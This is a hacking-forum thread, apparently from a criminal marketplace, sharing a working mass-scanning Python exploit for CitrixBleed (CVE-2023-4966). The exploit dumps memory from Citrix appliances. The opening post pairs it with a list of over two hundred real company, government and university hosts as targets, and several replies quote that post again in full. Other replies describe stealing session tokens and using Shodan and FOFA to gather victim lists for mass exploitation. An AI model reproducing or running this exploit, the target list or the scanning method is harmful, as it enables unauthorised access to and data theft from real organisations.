CitrixBleed / CVE-2023-4966
by cccp - Wednesday October 25, 2023 at 03:40 PM
#1
hey little skidlords, if any of you have been keeping your eyes glued on infosec at all you have already heard of CitrixBleed, so here is the public exploit but with threads for mass scanning and a small list of hosts for you to test it out

exploit:
#!/usr/bin/env python3 import requests import urllib3 import threading import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Read URLs from file with open('urls.txt', 'r') as file:     urls = file.readlines() def check_url(url):     start_time = time.time()     headers = {         "Host": "a"*24576     }     r = requests.get(f"{url.strip()}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)     end_time = time.time()     size = len(r.content)     if r.status_code == 200:         print(f"--- Dumped Memory for {url.strip()} ---")         print(r.text[131050:])         print("---      End      ---")         print(f"Response size: {size} bytes")         print(f"Time taken: {end_time - start_time} seconds")     else:         print(f"Could not dump memory for {url.strip()}") threads = [] for url in urls:     thread = threading.Thread(target=check_url, args=(url,))     threads.append(thread)     thread.start() for thread in threads:     thread.join()

list of hosts:
dwp-usda.ra.ericsson.net erd.allstate.com ctx.mobily.com.sa teletrabajo.telefonica.com.pe login.mwgroup.net citrix.swiftair.es citrix.bpbio.com.br minube.santotomas.cl voila.direct2dll.com appstore.ypf.com citrix.april.com login.identity.wisag.de octlifvpn.misrservices.com myaccess.borouge.com escritoriovirtual.imbanaco.com.co storefront.lbbd.gov.uk portal.tfl.gov.uk ctx.diamante.com.pe login.indraweb.net desktopstudent.hhs.nl citrixbil.bepensa.com peagateway.pea.co.th er4.caixabank.com virtual-services.ext.nokia.com nsauth-2mfa.remote.tfl.gov.uk believe.telefonicachile.cl bastille.grenoble.fr authvchnform.cognizant.com sales3.trane.com login-webmail.difesa.it remoto.trt9.jus.br go.soprema.com er2.caixabank.com terminal103.arbeitsagentur.de zdesktop.zonamerica.com vdioncloud.gmodelo.com.mx chatonline.humano.com.do myapps.underarmour.com virtual.claro.com.co workspace05.t-mobile.com xen.noblecorp.com go.psd.gov.sa portal.accell-group.com federate.watania.ae owaauth.ooredoo.qa agcitrix.grupofleury.com.br myapp.tcs.com citrixmasterssl.muc wts.unibw.de ssldanisman.hayat.com.tr citrix.scc.pe myuniapps.unimelb.edu.au terminal203.arbeitsagentur.de sara.icesi.edu.co vdi.asp-bgld.at citrix.system-group.it citrix.maxsum.com sg.marfrig.com.br kww.hoermann.com miescritorio.indra.es i-ras.volkswagen.com.br auth2.lyon.fr citrix.vw.com.ar toolbox.cargolux.com ecrug.worley.com home5.bouyguestelecom.fr access.cloud.weir rm.bs-service-portal.com vtagex.sepe.es dwp.ra.ericsson.net remote.transputec.com acceso.entel.pe sistemasdeacessoremoto.cemig.com.br acessoremoto.b0422.com.br people.smart owaeuaut.iberdrola.com smca.swisscom.com scb.pscnet.com.tw apps.patrick.com.au access.se.2fa.msdp.ericsson.net virtualapps.claro.com.co vpn.remoto.tgt.net.ar citrixpro.gruposancorseguros.com sconnect.maybank.com extranet2.macro.com.ar ctx.ypf.com citrixhd.gmodelo.com.mx nsauth-1fa.tfl.gov.uk login.aeronautica.difesa.it citrix.bcp.com.pe logon.vietnamairlines.com argodesk-us.argogroupus.com webmail.nis.rs cloudapp.fcu.edu.tw virtualaccess.telecom.com.ar api.ucam.edu apps.bigdutchman.com access.tbi.nl mmcnsauth.montefiore.org nsauth-2mfb.remote.tfl.gov.uk ttconnect.turktelekom.com.tr citrix.hiig.com citrixbrdrp.cofco-intl.com iflex-adc.quintiles.com citrix.worleyparsons.com citrix.telefonicamoviles.cl citrixalco.grupokonecta.com.ar apps.novartis.com nsauthldap.epm.com.co auth.allianzsp.sk workspace.apac.dsv.com apphouse.underarmour.com apps.ufl.edu auth.slc.qld.edu.au er3.caixabank.com domailauth.dolphinenergy.com auth-mfa.gmh.edu workspace.amer.dsv.com vdi.doosanheavy.com intra.felda.net.my vapps.unisa.edu.au aaa2.coviran.es webmail.martiag.ch ext.gbh.fr redagent.vodafone.com.tr vdi.shinhwaworld.com er1.caixabank.com cloud.gasco.ae e-campus.ap.be citrix.ssl.eon.com 192.168.31.158 apps.abbott.com vip.sisma.org.il remote.jhg.com.au workspace.transamerica.com ctxportalh5.customers.champ.aero auth.windesheim.nl waha2.teleperformance.com.br labvirtual.upc.edu.pe iconnect.infosys.com connect.maybank.com citrix.coor.com aaaowa.bclc.com aegisxdn-incloud.aegisglobal.com my.femwell.com vfg-citrix-ext.vodafone.com citrix.wi-sys.com.sa webaccess.cumbria.gov.uk apps.connectbe.biz portalacceso.uao.edu.co virtualdesk.montechelo.com.co citrixportal.rm.dk nsauth.leeds.gov.uk apps.taibahu.edu.sa nossaempresa.sodexo.com.br denremoteaccess.jacobs.com escritorio.imesapi.es workspace06.t-mobile.com citrix.sew-eurodrive.com.br myworkspace-latam.lumen.com remoteapp.coscon.com nuvem.copel.com vdi.mapfre.com.br remotofsa.vipal.com.br mycloud.bayer.biz xcitrix.partssource.com app.blulogistics.net receiver.falabella.com terminal201.arbeitsagentur.de citrix.emilfrey.de teleportst.ais.co.th etisalat.vdi.ae apps.moh.gov.kw lbse.edu-bgld.at oivpn.oi.net.br ahlvpn.thyteknik.com.tr twp.swisscom.com portal.800-flowers.net draco.pfnonwovens.com login.liv.ac.uk mycloud.gatech.edu ns2fauth.navistar.com my.allstate.com appconnect.wellstar.org vdi.cri.credomatic.com portal.etcconnect.com nsvpn.orange.com.do app.acueducto.com.co vapps.ryerson.ca remoto.elektro.com.br webduo.mhd.com apps-emea.frieslandcampina.com dcmg.invotec.com.au myteamsrh.cegedim-srh.net virtual-services-china.ext.nokia.com extranet.claro.com.br mystore.gatech.edu acceso2.contraloria.gob.do redmobile.vodafone.com.tr citrix.otsuka-us.com portal.hoppenbrouwerstechniek.nl oisistemas.oi.net.br portal.protective.com ape1.fiemg.com.br extvpn.movistar.com.mx auth.gmh.edu access.indraweb.net i-rasweb.volkswagen.com.br evirtualcge.grupocge.cl labvirtual.usil.edu.pe auth.westminster.ac.uk mystore1.gatech.edu virtual-services-india.ext.nokia.com citrix.husqvarnagroup.com gteanywhere.grantierra.com wmaccess.homeoffice.wal-mart.com virtual-services-americas.ext.nokia.com nsvpn.altice.com.do apps.falabella.com csg.comune.cervia.ra.it vapp.nbtc.go.th eservice.moj.gov.sa waha.teleperformance.com.br vdi.erc.or.th vdi.doosan.com mycsunsoftware.csun.edu vpn.movistar.com.mx mobilidade.tst.jus.br worug.worley.com workarea.aerolineas.com.ar xenapp.oilserv.com connect.marcegaglia.com auth.uni-siegen.de
Ban reason: Malware | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect.
http://raiddfzn73ir6iyxlf7nwytnujiflddog...7hqd.onion

STrojan/Win32.WannaCryptor.R200571
(Permanent)
Reply
#2
Have anyone tested the above exploit?
I've got some questions about it.

Thanks in advance for the experienced profs out there.
Reply
#3
(11-16-2023, 10:58 AM)malibu Wrote: Have anyone tested the above exploit?
I've got some questions about it.

Thanks in advance for the experienced profs out there.

I've tried almost similar exploit, i manage to grab some tokens but never manage to login lol
I tried with modified host (AAAAAA...) and i never succeeded, maybe i'm dumb af lol

EDIT : Nevermind i was just dumb dumb it's easy work lol
Reply
#4
(11-23-2023, 03:13 PM)gaslighter Wrote: How do you mass scan for such new vulnerabilities like citrixbleed?

(10-25-2023, 03:40 PM)cccp Wrote: hey little skidlords, if any of you have been keeping your eyes glued on infosec at all you have already heard of CitrixBleed, so here is the public exploit but with threads for mass scanning and a small list of hosts for you to test it out

exploit:
#!/usr/bin/env python3 import requests import urllib3 import threading import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Read URLs from file with open('urls.txt', 'r') as file:     urls = file.readlines() def check_url(url):     start_time = time.time()     headers = {         "Host": "a"*24576     }     r = requests.get(f"{url.strip()}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)     end_time = time.time()     size = len(r.content)     if r.status_code == 200:         print(f"--- Dumped Memory for {url.strip()} ---")         print(r.text[131050:])         print("---      End      ---")         print(f"Response size: {size} bytes")         print(f"Time taken: {end_time - start_time} seconds")     else:         print(f"Could not dump memory for {url.strip()}") threads = [] for url in urls:     thread = threading.Thread(target=check_url, args=(url,))     threads.append(thread)     thread.start() for thread in threads:     thread.join()

list of hosts:
dwp-usda.ra.ericsson.net erd.allstate.com ctx.mobily.com.sa teletrabajo.telefonica.com.pe login.mwgroup.net citrix.swiftair.es citrix.bpbio.com.br minube.santotomas.cl voila.direct2dll.com appstore.ypf.com citrix.april.com login.identity.wisag.de octlifvpn.misrservices.com myaccess.borouge.com escritoriovirtual.imbanaco.com.co storefront.lbbd.gov.uk portal.tfl.gov.uk ctx.diamante.com.pe login.indraweb.net desktopstudent.hhs.nl citrixbil.bepensa.com peagateway.pea.co.th er4.caixabank.com virtual-services.ext.nokia.com nsauth-2mfa.remote.tfl.gov.uk believe.telefonicachile.cl bastille.grenoble.fr authvchnform.cognizant.com sales3.trane.com login-webmail.difesa.it remoto.trt9.jus.br go.soprema.com er2.caixabank.com terminal103.arbeitsagentur.de zdesktop.zonamerica.com vdioncloud.gmodelo.com.mx chatonline.humano.com.do myapps.underarmour.com virtual.claro.com.co workspace05.t-mobile.com xen.noblecorp.com go.psd.gov.sa portal.accell-group.com federate.watania.ae owaauth.ooredoo.qa agcitrix.grupofleury.com.br myapp.tcs.com citrixmasterssl.muc wts.unibw.de ssldanisman.hayat.com.tr citrix.scc.pe myuniapps.unimelb.edu.au terminal203.arbeitsagentur.de sara.icesi.edu.co vdi.asp-bgld.at citrix.system-group.it citrix.maxsum.com sg.marfrig.com.br kww.hoermann.com miescritorio.indra.es i-ras.volkswagen.com.br auth2.lyon.fr citrix.vw.com.ar toolbox.cargolux.com ecrug.worley.com home5.bouyguestelecom.fr access.cloud.weir rm.bs-service-portal.com vtagex.sepe.es dwp.ra.ericsson.net remote.transputec.com acceso.entel.pe sistemasdeacessoremoto.cemig.com.br acessoremoto.b0422.com.br people.smart owaeuaut.iberdrola.com smca.swisscom.com scb.pscnet.com.tw apps.patrick.com.au access.se.2fa.msdp.ericsson.net virtualapps.claro.com.co vpn.remoto.tgt.net.ar citrixpro.gruposancorseguros.com sconnect.maybank.com extranet2.macro.com.ar ctx.ypf.com citrixhd.gmodelo.com.mx nsauth-1fa.tfl.gov.uk login.aeronautica.difesa.it citrix.bcp.com.pe logon.vietnamairlines.com argodesk-us.argogroupus.com webmail.nis.rs cloudapp.fcu.edu.tw virtualaccess.telecom.com.ar api.ucam.edu apps.bigdutchman.com access.tbi.nl mmcnsauth.montefiore.org nsauth-2mfb.remote.tfl.gov.uk ttconnect.turktelekom.com.tr citrix.hiig.com citrixbrdrp.cofco-intl.com iflex-adc.quintiles.com citrix.worleyparsons.com citrix.telefonicamoviles.cl citrixalco.grupokonecta.com.ar apps.novartis.com nsauthldap.epm.com.co auth.allianzsp.sk workspace.apac.dsv.com apphouse.underarmour.com apps.ufl.edu auth.slc.qld.edu.au er3.caixabank.com domailauth.dolphinenergy.com auth-mfa.gmh.edu workspace.amer.dsv.com vdi.doosanheavy.com intra.felda.net.my vapps.unisa.edu.au aaa2.coviran.es webmail.martiag.ch ext.gbh.fr redagent.vodafone.com.tr vdi.shinhwaworld.com er1.caixabank.com cloud.gasco.ae e-campus.ap.be citrix.ssl.eon.com 192.168.31.158 apps.abbott.com vip.sisma.org.il remote.jhg.com.au workspace.transamerica.com ctxportalh5.customers.champ.aero auth.windesheim.nl waha2.teleperformance.com.br labvirtual.upc.edu.pe iconnect.infosys.com connect.maybank.com citrix.coor.com aaaowa.bclc.com aegisxdn-incloud.aegisglobal.com my.femwell.com vfg-citrix-ext.vodafone.com citrix.wi-sys.com.sa webaccess.cumbria.gov.uk apps.connectbe.biz portalacceso.uao.edu.co virtualdesk.montechelo.com.co citrixportal.rm.dk nsauth.leeds.gov.uk apps.taibahu.edu.sa nossaempresa.sodexo.com.br denremoteaccess.jacobs.com escritorio.imesapi.es workspace06.t-mobile.com citrix.sew-eurodrive.com.br myworkspace-latam.lumen.com remoteapp.coscon.com nuvem.copel.com vdi.mapfre.com.br remotofsa.vipal.com.br mycloud.bayer.biz xcitrix.partssource.com app.blulogistics.net receiver.falabella.com terminal201.arbeitsagentur.de citrix.emilfrey.de teleportst.ais.co.th etisalat.vdi.ae apps.moh.gov.kw lbse.edu-bgld.at oivpn.oi.net.br ahlvpn.thyteknik.com.tr twp.swisscom.com portal.800-flowers.net draco.pfnonwovens.com login.liv.ac.uk mycloud.gatech.edu ns2fauth.navistar.com my.allstate.com appconnect.wellstar.org vdi.cri.credomatic.com portal.etcconnect.com nsvpn.orange.com.do app.acueducto.com.co vapps.ryerson.ca remoto.elektro.com.br webduo.mhd.com apps-emea.frieslandcampina.com dcmg.invotec.com.au myteamsrh.cegedim-srh.net virtual-services-china.ext.nokia.com extranet.claro.com.br mystore.gatech.edu acceso2.contraloria.gob.do redmobile.vodafone.com.tr citrix.otsuka-us.com portal.hoppenbrouwerstechniek.nl oisistemas.oi.net.br portal.protective.com ape1.fiemg.com.br extvpn.movistar.com.mx auth.gmh.edu access.indraweb.net i-rasweb.volkswagen.com.br evirtualcge.grupocge.cl labvirtual.usil.edu.pe auth.westminster.ac.uk mystore1.gatech.edu virtual-services-india.ext.nokia.com citrix.husqvarnagroup.com gteanywhere.grantierra.com wmaccess.homeoffice.wal-mart.com virtual-services-americas.ext.nokia.com nsvpn.altice.com.do apps.falabella.com csg.comune.cervia.ra.it vapp.nbtc.go.th eservice.moj.gov.sa waha.teleperformance.com.br vdi.erc.or.th vdi.doosan.com mycsunsoftware.csun.edu vpn.movistar.com.mx mobilidade.tst.jus.br worug.worley.com workarea.aerolineas.com.ar xenapp.oilserv.com connect.marcegaglia.com auth.uni-siegen.de

Modify the script to handle URL list instead of one by one
Reply
#5
You can use en.fofa.info/shodan.io, in addition follow @/fofabot on twitter which sometimes provide dork to find vulnerable servers/services 
With fofa you can download your search query in csv format and filter only with link/ip/host or whatever combination you need to mass exploit, without paying you have 2900 credit which equal 2900 results (you can download 2900 lines).  

But tbh at this moment i think all valuable target have already been pwnd (except in Russia maybe), between ransomware group, espionnage group, random guys who mass exploit for fun, cryptominers and so on this citrix bleed episode is near his end i mean if you wanted to make money you missed the train 

(12-29-2023, 02:38 AM)gaslighter Wrote: What I meant was, how do you obtain a "URL list"? Surely you wouldn't go about scraping the web for all websites and just trying the script on each one by one, that would be retarded. I wanted to know if someone has an efficient way of looking for potentially vulnerable websites (maybe using masscan or something)?

(11-26-2023, 11:06 PM)ScoobyDoo Wrote:
(11-23-2023, 03:13 PM)gaslighter Wrote: How do you mass scan for such new vulnerabilities like citrixbleed?

(10-25-2023, 03:40 PM)cccp Wrote: hey little skidlords, if any of you have been keeping your eyes glued on infosec at all you have already heard of CitrixBleed, so here is the public exploit but with threads for mass scanning and a small list of hosts for you to test it out

exploit:
#!/usr/bin/env python3 import requests import urllib3 import threading import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Read URLs from file with open('urls.txt', 'r') as file:     urls = file.readlines() def check_url(url):     start_time = time.time()     headers = {         "Host": "a"*24576     }     r = requests.get(f"{url.strip()}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)     end_time = time.time()     size = len(r.content)     if r.status_code == 200:         print(f"--- Dumped Memory for {url.strip()} ---")         print(r.text[131050:])         print("---      End      ---")         print(f"Response size: {size} bytes")         print(f"Time taken: {end_time - start_time} seconds")     else:         print(f"Could not dump memory for {url.strip()}") threads = [] for url in urls:     thread = threading.Thread(target=check_url, args=(url,))     threads.append(thread)     thread.start() for thread in threads:     thread.join()

list of hosts:
dwp-usda.ra.ericsson.net erd.allstate.com ctx.mobily.com.sa teletrabajo.telefonica.com.pe login.mwgroup.net citrix.swiftair.es citrix.bpbio.com.br minube.santotomas.cl voila.direct2dll.com appstore.ypf.com citrix.april.com login.identity.wisag.de octlifvpn.misrservices.com myaccess.borouge.com escritoriovirtual.imbanaco.com.co storefront.lbbd.gov.uk portal.tfl.gov.uk ctx.diamante.com.pe login.indraweb.net desktopstudent.hhs.nl citrixbil.bepensa.com peagateway.pea.co.th er4.caixabank.com virtual-services.ext.nokia.com nsauth-2mfa.remote.tfl.gov.uk believe.telefonicachile.cl bastille.grenoble.fr authvchnform.cognizant.com sales3.trane.com login-webmail.difesa.it remoto.trt9.jus.br go.soprema.com er2.caixabank.com terminal103.arbeitsagentur.de zdesktop.zonamerica.com vdioncloud.gmodelo.com.mx chatonline.humano.com.do myapps.underarmour.com virtual.claro.com.co workspace05.t-mobile.com xen.noblecorp.com go.psd.gov.sa portal.accell-group.com federate.watania.ae owaauth.ooredoo.qa agcitrix.grupofleury.com.br myapp.tcs.com citrixmasterssl.muc wts.unibw.de ssldanisman.hayat.com.tr citrix.scc.pe myuniapps.unimelb.edu.au terminal203.arbeitsagentur.de sara.icesi.edu.co vdi.asp-bgld.at citrix.system-group.it citrix.maxsum.com sg.marfrig.com.br kww.hoermann.com miescritorio.indra.es i-ras.volkswagen.com.br auth2.lyon.fr citrix.vw.com.ar toolbox.cargolux.com ecrug.worley.com home5.bouyguestelecom.fr access.cloud.weir rm.bs-service-portal.com vtagex.sepe.es dwp.ra.ericsson.net remote.transputec.com acceso.entel.pe sistemasdeacessoremoto.cemig.com.br acessoremoto.b0422.com.br people.smart owaeuaut.iberdrola.com smca.swisscom.com scb.pscnet.com.tw apps.patrick.com.au access.se.2fa.msdp.ericsson.net virtualapps.claro.com.co vpn.remoto.tgt.net.ar citrixpro.gruposancorseguros.com sconnect.maybank.com extranet2.macro.com.ar ctx.ypf.com citrixhd.gmodelo.com.mx nsauth-1fa.tfl.gov.uk login.aeronautica.difesa.it citrix.bcp.com.pe logon.vietnamairlines.com argodesk-us.argogroupus.com webmail.nis.rs cloudapp.fcu.edu.tw virtualaccess.telecom.com.ar api.ucam.edu apps.bigdutchman.com access.tbi.nl mmcnsauth.montefiore.org nsauth-2mfb.remote.tfl.gov.uk ttconnect.turktelekom.com.tr citrix.hiig.com citrixbrdrp.cofco-intl.com iflex-adc.quintiles.com citrix.worleyparsons.com citrix.telefonicamoviles.cl citrixalco.grupokonecta.com.ar apps.novartis.com nsauthldap.epm.com.co auth.allianzsp.sk workspace.apac.dsv.com apphouse.underarmour.com apps.ufl.edu auth.slc.qld.edu.au er3.caixabank.com domailauth.dolphinenergy.com auth-mfa.gmh.edu workspace.amer.dsv.com vdi.doosanheavy.com intra.felda.net.my vapps.unisa.edu.au aaa2.coviran.es webmail.martiag.ch ext.gbh.fr redagent.vodafone.com.tr vdi.shinhwaworld.com er1.caixabank.com cloud.gasco.ae e-campus.ap.be citrix.ssl.eon.com 192.168.31.158 apps.abbott.com vip.sisma.org.il remote.jhg.com.au workspace.transamerica.com ctxportalh5.customers.champ.aero auth.windesheim.nl waha2.teleperformance.com.br labvirtual.upc.edu.pe iconnect.infosys.com connect.maybank.com citrix.coor.com aaaowa.bclc.com aegisxdn-incloud.aegisglobal.com my.femwell.com vfg-citrix-ext.vodafone.com citrix.wi-sys.com.sa webaccess.cumbria.gov.uk apps.connectbe.biz portalacceso.uao.edu.co virtualdesk.montechelo.com.co citrixportal.rm.dk nsauth.leeds.gov.uk apps.taibahu.edu.sa nossaempresa.sodexo.com.br denremoteaccess.jacobs.com escritorio.imesapi.es workspace06.t-mobile.com citrix.sew-eurodrive.com.br myworkspace-latam.lumen.com remoteapp.coscon.com nuvem.copel.com vdi.mapfre.com.br remotofsa.vipal.com.br mycloud.bayer.biz xcitrix.partssource.com app.blulogistics.net receiver.falabella.com terminal201.arbeitsagentur.de citrix.emilfrey.de teleportst.ais.co.th etisalat.vdi.ae apps.moh.gov.kw lbse.edu-bgld.at oivpn.oi.net.br ahlvpn.thyteknik.com.tr twp.swisscom.com portal.800-flowers.net draco.pfnonwovens.com login.liv.ac.uk mycloud.gatech.edu ns2fauth.navistar.com my.allstate.com appconnect.wellstar.org vdi.cri.credomatic.com portal.etcconnect.com nsvpn.orange.com.do app.acueducto.com.co vapps.ryerson.ca remoto.elektro.com.br webduo.mhd.com apps-emea.frieslandcampina.com dcmg.invotec.com.au myteamsrh.cegedim-srh.net virtual-services-china.ext.nokia.com extranet.claro.com.br mystore.gatech.edu acceso2.contraloria.gob.do redmobile.vodafone.com.tr citrix.otsuka-us.com portal.hoppenbrouwerstechniek.nl oisistemas.oi.net.br portal.protective.com ape1.fiemg.com.br extvpn.movistar.com.mx auth.gmh.edu access.indraweb.net i-rasweb.volkswagen.com.br evirtualcge.grupocge.cl labvirtual.usil.edu.pe auth.westminster.ac.uk mystore1.gatech.edu virtual-services-india.ext.nokia.com citrix.husqvarnagroup.com gteanywhere.grantierra.com wmaccess.homeoffice.wal-mart.com virtual-services-americas.ext.nokia.com nsvpn.altice.com.do apps.falabella.com csg.comune.cervia.ra.it vapp.nbtc.go.th eservice.moj.gov.sa waha.teleperformance.com.br vdi.erc.or.th vdi.doosan.com mycsunsoftware.csun.edu vpn.movistar.com.mx mobilidade.tst.jus.br worug.worley.com workarea.aerolineas.com.ar xenapp.oilserv.com connect.marcegaglia.com auth.uni-siegen.de

Modify the script to handle URL list instead of one by one
Reply
#6
(12-29-2023, 01:53 PM)ScoobyDoo Wrote: You can use en.fofa.info/shodan.io, in addition follow @/fofabot on twitter which sometimes provide dork to find vulnerable servers/services 
With fofa you can download your search query in csv format and filter only with link/ip/host or whatever combination you need to mass exploit, without paying you have 2900 credit which equal 2900 results (you can download 2900 lines).  

But tbh at this moment i think all valuable target have already been pwnd (except in Russia maybe), between ransomware group, espionnage group, random guys who mass exploit for fun, cryptominers and so on this citrix bleed episode is near his end i mean if you wanted to make money you missed the train 

(12-29-2023, 02:38 AM)gaslighter Wrote: What I meant was, how do you obtain a "URL list"? Surely you wouldn't go about scraping the web for all websites and just trying the script on each one by one, that would be retarded. I wanted to know if someone has an efficient way of looking for potentially vulnerable websites (maybe using masscan or something)?

(11-26-2023, 11:06 PM)ScoobyDoo Wrote:
(11-23-2023, 03:13 PM)gaslighter Wrote: How do you mass scan for such new vulnerabilities like citrixbleed?

(10-25-2023, 03:40 PM)cccp Wrote: hey little skidlords, if any of you have been keeping your eyes glued on infosec at all you have already heard of CitrixBleed, so here is the public exploit but with threads for mass scanning and a small list of hosts for you to test it out

exploit:
#!/usr/bin/env python3 import requests import urllib3 import threading import os import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Read URLs from file with open('urls.txt', 'r') as file:     urls = file.readlines() def check_url(url):     start_time = time.time()     headers = {         "Host": "a"*24576     }     r = requests.get(f"{url.strip()}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)     end_time = time.time()     size = len(r.content)     if r.status_code == 200:         print(f"--- Dumped Memory for {url.strip()} ---")         print(r.text[131050:])         print("---      End      ---")         print(f"Response size: {size} bytes")         print(f"Time taken: {end_time - start_time} seconds")     else:         print(f"Could not dump memory for {url.strip()}") threads = [] for url in urls:     thread = threading.Thread(target=check_url, args=(url,))     threads.append(thread)     thread.start() for thread in threads:     thread.join()

list of hosts:
dwp-usda.ra.ericsson.net erd.allstate.com ctx.mobily.com.sa teletrabajo.telefonica.com.pe login.mwgroup.net citrix.swiftair.es citrix.bpbio.com.br minube.santotomas.cl voila.direct2dll.com appstore.ypf.com citrix.april.com login.identity.wisag.de octlifvpn.misrservices.com myaccess.borouge.com escritoriovirtual.imbanaco.com.co storefront.lbbd.gov.uk portal.tfl.gov.uk ctx.diamante.com.pe login.indraweb.net desktopstudent.hhs.nl citrixbil.bepensa.com peagateway.pea.co.th er4.caixabank.com virtual-services.ext.nokia.com nsauth-2mfa.remote.tfl.gov.uk believe.telefonicachile.cl bastille.grenoble.fr authvchnform.cognizant.com sales3.trane.com login-webmail.difesa.it remoto.trt9.jus.br go.soprema.com er2.caixabank.com terminal103.arbeitsagentur.de zdesktop.zonamerica.com vdioncloud.gmodelo.com.mx chatonline.humano.com.do myapps.underarmour.com virtual.claro.com.co workspace05.t-mobile.com xen.noblecorp.com go.psd.gov.sa portal.accell-group.com federate.watania.ae owaauth.ooredoo.qa agcitrix.grupofleury.com.br myapp.tcs.com citrixmasterssl.muc wts.unibw.de ssldanisman.hayat.com.tr citrix.scc.pe myuniapps.unimelb.edu.au terminal203.arbeitsagentur.de sara.icesi.edu.co vdi.asp-bgld.at citrix.system-group.it citrix.maxsum.com sg.marfrig.com.br kww.hoermann.com miescritorio.indra.es i-ras.volkswagen.com.br auth2.lyon.fr citrix.vw.com.ar toolbox.cargolux.com ecrug.worley.com home5.bouyguestelecom.fr access.cloud.weir rm.bs-service-portal.com vtagex.sepe.es dwp.ra.ericsson.net remote.transputec.com acceso.entel.pe sistemasdeacessoremoto.cemig.com.br acessoremoto.b0422.com.br people.smart owaeuaut.iberdrola.com smca.swisscom.com scb.pscnet.com.tw apps.patrick.com.au access.se.2fa.msdp.ericsson.net virtualapps.claro.com.co vpn.remoto.tgt.net.ar citrixpro.gruposancorseguros.com sconnect.maybank.com extranet2.macro.com.ar ctx.ypf.com citrixhd.gmodelo.com.mx nsauth-1fa.tfl.gov.uk login.aeronautica.difesa.it citrix.bcp.com.pe logon.vietnamairlines.com argodesk-us.argogroupus.com webmail.nis.rs cloudapp.fcu.edu.tw virtualaccess.telecom.com.ar api.ucam.edu apps.bigdutchman.com access.tbi.nl mmcnsauth.montefiore.org nsauth-2mfb.remote.tfl.gov.uk ttconnect.turktelekom.com.tr citrix.hiig.com citrixbrdrp.cofco-intl.com iflex-adc.quintiles.com citrix.worleyparsons.com citrix.telefonicamoviles.cl citrixalco.grupokonecta.com.ar apps.novartis.com nsauthldap.epm.com.co auth.allianzsp.sk workspace.apac.dsv.com apphouse.underarmour.com apps.ufl.edu auth.slc.qld.edu.au er3.caixabank.com domailauth.dolphinenergy.com auth-mfa.gmh.edu workspace.amer.dsv.com vdi.doosanheavy.com intra.felda.net.my vapps.unisa.edu.au aaa2.coviran.es webmail.martiag.ch ext.gbh.fr redagent.vodafone.com.tr vdi.shinhwaworld.com er1.caixabank.com cloud.gasco.ae e-campus.ap.be citrix.ssl.eon.com 192.168.31.158 apps.abbott.com vip.sisma.org.il remote.jhg.com.au workspace.transamerica.com ctxportalh5.customers.champ.aero auth.windesheim.nl waha2.teleperformance.com.br labvirtual.upc.edu.pe iconnect.infosys.com connect.maybank.com citrix.coor.com aaaowa.bclc.com aegisxdn-incloud.aegisglobal.com my.femwell.com vfg-citrix-ext.vodafone.com citrix.wi-sys.com.sa webaccess.cumbria.gov.uk apps.connectbe.biz portalacceso.uao.edu.co virtualdesk.montechelo.com.co citrixportal.rm.dk nsauth.leeds.gov.uk apps.taibahu.edu.sa nossaempresa.sodexo.com.br denremoteaccess.jacobs.com escritorio.imesapi.es workspace06.t-mobile.com citrix.sew-eurodrive.com.br myworkspace-latam.lumen.com remoteapp.coscon.com nuvem.copel.com vdi.mapfre.com.br remotofsa.vipal.com.br mycloud.bayer.biz xcitrix.partssource.com app.blulogistics.net receiver.falabella.com terminal201.arbeitsagentur.de citrix.emilfrey.de teleportst.ais.co.th etisalat.vdi.ae apps.moh.gov.kw lbse.edu-bgld.at oivpn.oi.net.br ahlvpn.thyteknik.com.tr twp.swisscom.com portal.800-flowers.net draco.pfnonwovens.com login.liv.ac.uk mycloud.gatech.edu ns2fauth.navistar.com my.allstate.com appconnect.wellstar.org vdi.cri.credomatic.com portal.etcconnect.com nsvpn.orange.com.do app.acueducto.com.co vapps.ryerson.ca remoto.elektro.com.br webduo.mhd.com apps-emea.frieslandcampina.com dcmg.invotec.com.au myteamsrh.cegedim-srh.net virtual-services-china.ext.nokia.com extranet.claro.com.br mystore.gatech.edu acceso2.contraloria.gob.do redmobile.vodafone.com.tr citrix.otsuka-us.com portal.hoppenbrouwerstechniek.nl oisistemas.oi.net.br portal.protective.com ape1.fiemg.com.br extvpn.movistar.com.mx auth.gmh.edu access.indraweb.net i-rasweb.volkswagen.com.br evirtualcge.grupocge.cl labvirtual.usil.edu.pe auth.westminster.ac.uk mystore1.gatech.edu virtual-services-india.ext.nokia.com citrix.husqvarnagroup.com gteanywhere.grantierra.com wmaccess.homeoffice.wal-mart.com virtual-services-americas.ext.nokia.com nsvpn.altice.com.do apps.falabella.com csg.comune.cervia.ra.it vapp.nbtc.go.th eservice.moj.gov.sa waha.teleperformance.com.br vdi.erc.or.th vdi.doosan.com mycsunsoftware.csun.edu vpn.movistar.com.mx mobilidade.tst.jus.br worug.worley.com workarea.aerolineas.com.ar xenapp.oilserv.com connect.marcegaglia.com auth.uni-siegen.de

Modify the script to handle URL list instead of one by one

I'm also interested to know how they do mass scans and find vulnerabilities
Reply
#7
using python for mass scanning should be considered a crime
Reply
#8
this will be a fun exercise
thanks
Reply
#9
nice thanks i hope i will see more threads like that
Reply
#10
nice for practise
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 807 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 263 02-06-2026, 07:08 PM
Last Post: hacker0123
  WordPress LFI to RCE - CVE-2025-0366 Serious 1 459 02-05-2026, 09:53 AM
Last Post: Sammm89
  Outlook CVE-2024-21413 for RCE: Hacking through a letter Loki 53 4,169 01-29-2026, 11:54 AM
Last Post: sergiojames



 Users browsing this thread: